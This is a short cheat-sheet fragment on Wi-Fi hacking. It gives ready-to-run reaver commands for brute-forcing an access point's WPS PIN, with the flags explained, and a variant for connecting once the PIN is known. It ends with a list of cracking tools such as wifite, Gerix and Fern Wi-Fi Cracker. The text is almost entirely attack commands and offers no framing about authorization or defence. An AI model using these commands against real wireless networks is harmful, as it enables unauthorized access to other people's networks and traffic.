reaver -i mon0 -b <BSSID> -S --no-nacks -d 7 -vv -c 1
[ -S : small DH keys for speed, --no-nacks : do not send NACKs, -d 7 : 7 second delay between attempts, -vv : verbose, -c 1 : channel ]
NOTE : If you already have the PIN :
reaver -i mon0 ( or the interface airoscript created if you use a fake MAC ) -b <BSSID> -vv -c <channel> -e <name of AP> -p
<WPS PIN>
Graphical Interface Tools For Wi-Fi Hacking
wifite [ text-based automation of the aircrack-ng steps, not graphical ]
Gerix Wi-Fi Cracker
Fern Wi-Fi Cracker